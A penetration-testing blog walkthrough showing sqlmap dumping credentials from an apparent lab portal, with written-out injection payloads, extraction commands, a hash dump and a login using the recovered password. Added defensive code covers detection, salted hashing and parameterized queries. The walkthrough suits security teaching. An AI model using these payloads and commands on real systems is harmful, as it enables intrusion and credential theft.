How To Dump Username And Password Using SQLMap Tool?

By Pentestblog 18/01/2022 SQL Injection 7 Comments

SQLMap Tool

Table of Content

  • What is sqlmap in Kali?
  • Dump Username And Password Using SQLMap

What is sqlmap in Kali?

SQLMap is an open-source tool used to both identify and exploit SQL injection vulnerabilities. It has many advanced features, such as the ability to dump usernames and passwords from a remote website and to bypass a WAF (Web Application Firewall).


Dump Username And Password Using SQLMap

In this blog, we are going to introduce the SQLMap tool, which is very popular. Using this tool we will dump usernames and passwords from a remote website.

Let’s begin. We have opened the login page of the Europa Corp admin portal. Keep in mind that this is a virtual environment. Don’t try to attack this website.


Let’s enter a random email and password. First, we will intercept this traffic using the Burp Suite tool that comes pre-installed in Kali Linux.


We have intercepted the traffic to the Europa Corp admin portal using Burp Suite. Let’s copy the whole request and save it in the sql.req file.


The sql.req file looks like this. Let’s display it using the cat command, which comes pre-installed in Kali Linux.


Before using the sqlmap tool, keep in mind that this website uses HTTPS (Hypertext Transfer Protocol Secure). If you don’t add the --force-ssl option to the sqlmap command, you can get an SSL error. First, we will retrieve the database names using the --dbs option.

sqlmap -r sql.req --force-ssl --dbs

        ___
       __H__
 ___ ___["]_____ ___ ___  {1.6.1.1#dev}
|_ -| . [.]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 23:59:46 /2022-01-16/

[23:59:46] [INFO] parsing HTTP request from 'sql.req'
[23:59:46] [INFO] resuming back-end DBMS 'mysql' 
[23:59:46] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: email (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: [email protected]' RLIKE (SELECT (CASE WHEN (5462=5462) THEN 0x61646d696e406575726f7061636f72702e687462 ELSE 0x28 END))-- uqLz&password=password

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: [email protected]' AND GTID_SUBSET(CONCAT(0x7178627671,(SELECT (ELT(6429=6429,1))),0x716a787871),6429)-- gHDo&password=password

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: [email protected]' AND (SELECT 4034 FROM (SELECT(SLEEP(5)))WwrX)-- frlv&password=password
---
[23:59:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 or 16.10 (yakkety or xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL 5
[23:59:48] [INFO] fetching database names
[23:59:48] [INFO] resumed: 'information_schema'
[23:59:48] [INFO] resumed: 'admin'
available databases [2]:
[*] admin
[*] information_schema

[23:59:48] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/admin-portal.europacorp.htb'

[*] ending @ 23:59:48 /2022-01-16/
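
Seen from the server side, the three payload families listed under "Parameter: email (POST)" are distinctive enough to flag in request logs. The sketch below is an added example, not part of the original post: it scans urlencoded POST bodies for those three shapes and reports clients that send more than one family. The sample events, client addresses and function names are constructed for illustration.

```python
from __future__ import annotations

import re
from collections import defaultdict
from urllib.parse import parse_qs, urlencode

# One signature per payload family listed in the sqlmap output above.
RULES = {
    "boolean-blind": re.compile(r"\bRLIKE\s*\(\s*SELECT\s*\(\s*CASE\s+WHEN\b", re.I),
    "error-based": re.compile(r"\bGTID_SUBSET\s*\(\s*CONCAT\s*\(\s*0x[0-9a-f]+", re.I),
    "time-blind": re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I),
}
# A quote that closes the string literal, later followed by a "-- " comment.
QUOTE_BREAKOUT = re.compile(r"'.*--\s", re.S)


def scan_form_body(body: str) -> list[tuple[str, str]]:
    """Return (parameter, finding) pairs for one urlencoded POST body."""
    findings = []
    # parse_qs percent-decodes and maps '+' to space, so encoded payloads match too.
    for param, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            for name, pattern in RULES.items():
                if pattern.search(value):
                    findings.append((param, name))
            if QUOTE_BREAKOUT.search(value):
                findings.append((param, "quote-breakout"))
    return findings


def clients_probing(events, min_families: int = 2) -> dict[str, list[str]]:
    """Clients that sent at least `min_families` distinct payload families."""
    seen = defaultdict(set)
    for client, body in events:
        for _param, finding in scan_form_body(body):
            if finding in RULES:
                seen[client].add(finding)
    return {c: sorted(f) for c, f in seen.items() if len(f) >= min_families}


def _body(email: str) -> str:
    # Build the body the way a browser or proxy would send the login form.
    return urlencode({"email": email, "password": "password"})


# Constructed events: (client address, POST body). Addresses are documentation
# ranges; payload shapes follow the output above with a placeholder e-mail.
SAMPLE_EVENTS = [
    ("192.0.2.10", _body("o'brien@example.test")),  # benign apostrophe
    ("198.51.100.7", _body(
        "user@example.test' RLIKE (SELECT (CASE WHEN (5462=5462) "
        "THEN 0x61 ELSE 0x28 END))-- uqLz")),
    ("198.51.100.7", _body(
        "user@example.test' AND GTID_SUBSET(CONCAT(0x7178627671,"
        "(SELECT (ELT(6429=6429,1))),0x716a787871),6429)-- gHDo")),
    ("198.51.100.7", _body(
        "user@example.test' AND (SELECT 4034 FROM (SELECT(SLEEP(5)))WwrX)-- frlv")),
]

if __name__ == "__main__":
    for client, body in SAMPLE_EVENTS:
        print(client, scan_form_body(body))
    print(clients_probing(SAMPLE_EVENTS))
```

Signatures like these only catch the payload shapes shown in this run; they are a detection aid and do not replace fixing the query that handles the email parameter.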


Our first mission completed successfully. We have got the database names of the remote website using the above command. Let’s find out all tables inside the admin database with the command below.

sqlmap -r sql.req --force-ssl -D admin --tables
        ___                                                                                                                                                                                   
       __H__                                                                                                                                        
 ___ ___[)]_____ ___ ___  {1.6.1.1#dev}                                                        
|_ -| . [']     | .'| . |                                                                      
|___|_  [)]_|_|_|__,|  _|                                                                                                                                             
      |_|V...       |_|   https://sqlmap.org                                                                                                                          
                                                                                                                                                    
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
                                                                                                                                                                      
[*] starting @ 00:03:09 /2022-01-17/                                                                                                                                                          
                                                                                                                                                    
[00:03:09] [INFO] parsing HTTP request from 'sql.req'                                                                                                                                         
[00:03:10] [INFO] resuming back-end DBMS 'mysql'                                                                                                                      
[00:03:10] [INFO] testing connection to the target URL                                                                                                                                        
sqlmap resumed the following injection point(s) from stored session:      
---                                                                                                                                                                   
Parameter: email (POST)                                                                                                                                                                       
    Type: boolean-based blind                                                                                                                                                                 
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause                                                                                                                                                                                   
    Payload: [email protected]' RLIKE (SELECT (CASE WHEN (5462=5462) THEN 0x61646d696e406575726f7061636f72702e687462 ELSE 0x28 END))-- uqLz&password=password                                                                                                    
                                                                                                                                                                                              
    Type: error-based                                                                          
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)                                                                                                                                                                        
    Payload: [email protected]' AND GTID_SUBSET(CONCAT(0x7178627671,(SELECT (ELT(6429=6429,1))),0x716a787871),6429)-- gHDo&password=password                                         
                                                                                                                                                    
    Type: time-based blind                     
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)                                                                                                         
    Payload: [email protected]' AND (SELECT 4034 FROM (SELECT(SLEEP(5)))WwrX)-- frlv&password=password                                                                                                                                                           
---                                      
[00:03:11] [INFO] the back-end DBMS is MySQL                                                                                         
web server operating system: Linux Ubuntu 16.04 or 16.10 (yakkety or xenial)                                                                                                                                                                                              
web application technology: Apache 2.4.18                                                                                                                                                     
back-end DBMS: MySQL 5                   
[00:03:11] [INFO] fetching tables for database: 'admin'                                                                              
[00:03:11] [INFO] resumed: 'users'                                                                                                                                                            
Database: admin                                                   
[1 table]                                      
+-------+                                      
| users |                                                         
+-------+                                      
                                               
[00:03:11] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/admin-portal.europacorp.htb'                                                                                                                                                  

[*] ending @ 00:03:11 /2022-01-17/                      


We have got the table name inside the admin database using the above command. Let’s find out all columns inside the users table.

sqlmap -r sql.req --force-ssl -D admin -T users --columns
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.6.1.1#dev}
|_ -| . [(]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 00:05:52 /2022-01-17/

[00:05:52] [INFO] parsing HTTP request from 'sql.req'
[00:05:53] [INFO] resuming back-end DBMS 'mysql' 
[00:05:53] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: email (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: [email protected]' RLIKE (SELECT (CASE WHEN (5462=5462) THEN 0x61646d696e406575726f7061636f72702e687462 ELSE 0x28 END))-- uqLz&password=password

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: [email protected]' AND GTID_SUBSET(CONCAT(0x7178627671,(SELECT (ELT(6429=6429,1))),0x716a787871),6429)-- gHDo&password=password

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: [email protected]' AND (SELECT 4034 FROM (SELECT(SLEEP(5)))WwrX)-- frlv&password=password
---
[00:05:54] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 or 16.10 (yakkety or xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL 5
[00:05:54] [INFO] fetching columns for table 'users' in database 'admin'
[00:05:54] [INFO] resumed: 'id'
[00:05:54] [INFO] resumed: 'int(11)'
[00:05:54] [INFO] resumed: 'username'
[00:05:54] [INFO] resumed: 'varchar(255)'
[00:05:54] [INFO] resumed: 'email'
[00:05:54] [INFO] resumed: 'varchar(255)'
[00:05:54] [INFO] resumed: 'password'
[00:05:54] [INFO] resumed: 'varchar(255)'
[00:05:54] [INFO] resumed: 'active'
[00:05:54] [INFO] resumed: 'tinyint(1)'
Database: admin
Table: users
[5 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| active   | tinyint(1)   |
| email    | varchar(255) |
| id       | int(11)      |
| password | varchar(255) |
| username | varchar(255) |
+----------+--------------+

[00:05:54] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/admin-portal.europacorp.htb'

[*] ending @ 00:05:54 /2022-01-17/


We have got the column names inside the users table using the above command. Let’s dump the email and password credentials with the command below.

sqlmap -r sql.req --force-ssl -D admin -T users -C email,password --dump
        ___                                                                                                                                         
       __H__                                                                                                                                                          
 ___ ___[,]_____ ___ ___  {1.6.1.1#dev}                                                                                                                                                       
|_ -| . [)]     | .'| . |                                                                                                                           
|___|_  ["]_|_|_|__,|  _|                                                                                                                                             
      |_|V...       |_|   https://sqlmap.org                                                                                                                                                  
                                                                                                                                                    
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
                                                                                                                                                                                              
[*] starting @ 00:08:33 /2022-01-17/                                      
                                                                          
[00:08:33] [INFO] parsing HTTP request from 'sql.req'                                                                                               
[00:08:34] [INFO] resuming back-end DBMS 'mysql'                                                                                                                      
[00:08:34] [INFO] testing connection to the target URL                             
sqlmap resumed the following injection point(s) from stored session:                                                                                                                          
---                                                                                            
Parameter: email (POST)                                                                                                                                                                                                                                                   
    Type: boolean-based blind                                                                                                                                                                 
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause                                                                                                                                                                                   
    Payload: [email protected]' RLIKE (SELECT (CASE WHEN (5462=5462) THEN 0x61646d696e406575726f7061636f72702e687462 ELSE 0x28 END))-- uqLz&password=password                                                                                                    
                                                                                                                                                                                              
    Type: error-based                                                     
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)                                                                                                                                                                        
    Payload: [email protected]' AND GTID_SUBSET(CONCAT(0x7178627671,(SELECT (ELT(6429=6429,1))),0x716a787871),6429)-- gHDo&password=password                                                                                                                     
                                                                                                                                                    
    Type: time-based blind                                                                                                                                            
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)                                  
    Payload: [email protected]' AND (SELECT 4034 FROM (SELECT(SLEEP(5)))WwrX)-- frlv&password=password                                                                                                                                                           
---                                                                                                                                                                                                                                                                       
[00:08:36] [INFO] the back-end DBMS is MySQL                                                                                                                                                  
web server operating system: Linux Ubuntu 16.04 or 16.10 (yakkety or xenial)                                                                                                                  
web application technology: Apache 2.4.18                                                                                            
back-end DBMS: MySQL 5                                                                                                                                                                        
[00:08:36] [INFO] fetching entries of column(s) 'email,password' for table 'users' in database 'admin'                                                                                        
[00:08:38] [INFO] retrieved: '[email protected]'                                                                                  
[00:08:39] [INFO] retrieved: '2b6d315337f18617ba18922c0b9597ff'                                                                      
[00:08:40] [INFO] retrieved: '[email protected]'                                                                                   
[00:08:42] [INFO] retrieved: '2b6d315337f18617ba18922c0b9597ff'                                                                      
[00:08:42] [INFO] recognized possible password hashes in column 'password'                                                           
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] n                                                                                                                                                                  
do you want to crack them via a dictionary-based attack? [Y/n/q] n                                                                                                                                                                                                        
Database: admin                                                                                                                                                                                                                                                           
Table: users                                                      
[2 entries]                                                       
+----------------------+----------------------------------+                                                                          
| email                | password                         |                                                                          
+----------------------+----------------------------------+                                                                          
| [email protected] | 2b6d315337f18617ba18922c0b9597ff |                                                                          
| [email protected]  | 2b6d315337f18617ba18922c0b9597ff |                                                                          
+----------------------+----------------------------------+                                                                          

[00:08:46] [INFO] table 'admin.users' dumped to CSV file '/root/.local/share/sqlmap/output/admin-portal.europacorp.htb/dump/admin/users.csv'                                                                                                                              
[00:08:46] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/admin-portal.europacorp.htb'                                                                                                                                                  

[*] ending @ 00:08:46 /2022-01-17/                                


Boom! We have got the emails and passwords from the remote website, but the passwords are not stored in plaintext: sqlmap recognized the values as possible password hashes. Most modern websites store password hashes rather than plaintext passwords in the database. But I am lazy. To recover the plaintext from the hashes, we will use the dcode website.
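
Both rows in the dump carry the same 32-character value, which is what an unsalted digest of a shared password looks like. The following added example (not from the original post) contrasts that with a per-user salted, iterated hash and a constant-time verify. MD5 is assumed only because it yields 32 hex characters (the page does not name the algorithm); the account names, password and PBKDF2 work factor are constructed.

```python
from __future__ import annotations

import hashlib
import hmac
import os
from collections import defaultdict

ITERATIONS = 600_000  # assumed PBKDF2-HMAC-SHA256 work factor for this sketch


def unsalted_digest(password: str) -> str:
    # Stand-in for the stored values in the dump: one fast hash, no salt.
    return hashlib.md5(password.encode(), usedforsecurity=False).hexdigest()


def hash_password(password: str) -> str:
    # A fresh random salt per account makes equal passwords hash differently.
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    try:
        scheme, iterations, salt_hex, dk_hex = stored.split("$")
        salt, expected = bytes.fromhex(salt_hex), bytes.fromhex(dk_hex)
        rounds = int(iterations)
    except ValueError:
        return False  # malformed record: reject instead of raising
    if scheme != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, rounds)
    return hmac.compare_digest(dk, expected)  # constant-time comparison


def shared_password_groups(stored: dict[str, str]) -> list[list[str]]:
    """Accounts whose stored value is identical, as in the two-row dump."""
    by_value = defaultdict(list)
    for account, value in stored.items():
        by_value[value].append(account)
    return sorted(sorted(group) for group in by_value.values() if len(group) > 1)


def demo() -> tuple[list[list[str]], list[list[str]]]:
    # Constructed accounts that share one constructed password.
    accounts = ["admin@example.test", "john@example.test"]
    password = "constructed-password"
    unsalted = {a: unsalted_digest(password) for a in accounts}
    salted = {a: hash_password(password) for a in accounts}
    return shared_password_groups(unsalted), shared_password_groups(salted)


if __name__ == "__main__":
    leaked, hardened = demo()
    print("identical stored values (unsalted):", leaked)
    print("identical stored values (salted):  ", hardened)
```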


Let’s put the valid credentials into the email and password fields. After that, we get a 302 redirect from the remote website.


Take a closer look at the below image.


Login Successful!!!!!
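
Everything sqlmap extracted above came through one injectable email POST parameter, and the fix for that is parameter binding. This added example (not the portal's code, which the post does not show) puts a string-concatenated login check beside a parameterized one and feeds both a true and a false injected condition. An in-memory SQLite database stands in for the MySQL back end, the column names follow the users table above, and the row, the function names and the in-SQL password comparison are assumptions.

```python
from __future__ import annotations

import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed row; columns mirror the `users` table in the output above.
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
        "email TEXT, password TEXT, active INTEGER)"
    )
    db.execute(
        "INSERT INTO users (username, email, password, active) "
        "VALUES ('alice', 'alice@example.test', 'constructed-hash', 1)"
    )
    return db


def login_vulnerable(db: sqlite3.Connection, email: str, password_hash: str) -> bool:
    # BEFORE: request values are pasted into the SQL text, so a quote in
    # `email` ends the string literal and the remainder is parsed as SQL.
    sql = (
        "SELECT id FROM users WHERE email = '" + email +
        "' AND password = '" + password_hash + "'"
    )
    return db.execute(sql).fetchone() is not None


def login_parameterized(db: sqlite3.Connection, email: str, password_hash: str) -> bool:
    # AFTER: the statement text is fixed; values are bound as data only.
    sql = "SELECT id FROM users WHERE email = ? AND password = ?"
    return db.execute(sql, (email, password_hash)).fetchone() is not None


def boolean_oracle(login) -> tuple[bool, bool]:
    """Login result for a true and a false injected condition (wrong password)."""
    db = make_db()
    true_case = login(db, "alice@example.test' AND 5462=5462-- x", "wrong")
    false_case = login(db, "alice@example.test' AND 5462=5463-- x", "wrong")
    return true_case, false_case


def stray_quote_result(login) -> str:
    """What a harmless apostrophe in the e-mail does to each implementation."""
    try:
        return str(login(make_db(), "o'brien@example.test", "x"))
    except sqlite3.OperationalError:
        return "sql-error"  # the observable difference error-based probing relies on


if __name__ == "__main__":
    for fn in (login_vulnerable, login_parameterized):
        print(fn.__name__, boolean_oracle(fn), stray_quote_result(fn))
```

With concatenation the two conditions produce different responses, which is the signal boolean-based blind extraction needs; with bound parameters both inputs are just non-matching e-mail strings.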


7 Comments

  1. Pankaj Jha 19/01/2022

    Very Nice Blog Bro

  2. cysecon 10/02/2022

    hi…..

    I got such good information on this topic; it's a very interesting one. You made a good site.
